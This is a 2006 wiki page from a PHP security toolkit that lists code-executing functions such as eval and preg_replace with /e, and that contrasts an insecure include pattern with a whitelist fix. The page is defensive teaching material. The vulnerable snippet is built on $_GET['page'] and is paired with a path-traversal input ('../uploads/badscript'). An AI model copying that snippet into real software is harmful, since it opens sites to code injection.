[[Eval Functions]]
Recent changes RSS feed
 
You are here: Web Application Component Toolkit » security » functions » Eval Functions
Table of Contents

Eval Functions

These functions can allow an arbitrary string or file to be executed as PHP code (with the privileges of PHP).

Includes

Including arbitrary files into a PHP program can allow code to be injected into that program. Especially including files that are writable in a shared or compromised environment, or where allow_url_fopen is enabled.

See “Includes Bad Practice” below.

General

  • eval - Eval executes an arbitrary string as PHP code.
  • create_function
  • preg_replace - Can execute arbitrary PHP code when the /e modifier is present in the search pattern.
  • php_check_syntax (PHP5) - phpchecksyntax currently also includes the file being checked (i.e. executes it as well) - see manual comments.

DOM XML (PHP5)

The DOM extension supports the use of streams in a number of ways. In particular the use of XIncludes where the path begins php:// or xsl:include tags in XSLT. This behaviour can be turned off (how?) - watch out when working with XML / XSLT from untrusted sources. See XML in PHP5

This function list is probably incomplete.

Exploits:

Code Injection Attack

Includes Bad Practice

A common beginners mistake with the include / require functions looks like this; 

echo '<a href="'.$_SERVER['PHP_SELF'].'?page=home">Home</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=links">Links</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=contact">Contact</a>';
 
include 'pages/'.$_GET['page'];

Bearing in mind Parameter Manipulation Attacks, it would be possible for the GET variable ‘page’ to contain anything, including directory paths which PHP will resolve e.g. 

$_GET['page'] == '../uploads/badscript'

so included file becomes pages/../uploads/badscript.php;

A better solution for this example would be; 

echo '<a href="'.$_SERVER['PHP_SELF'].'?page=home">Home</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=links">Links</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=contact">Contact</a>';
 
$pages = array('home','links','contact');
 
// If the page is known
if ( in_array($_GET['page'], $pages) ) {
    include 'pages/'.$_GET['page'].'.php';
 
// Otherwise use default...
} else {
    include 'pages/home.php';
}

Additional Information

 
security/functions/eval_functions.txt · Last modified: 2006/12/09 17:15
 
Hosting for this site donated by Procata PHP Development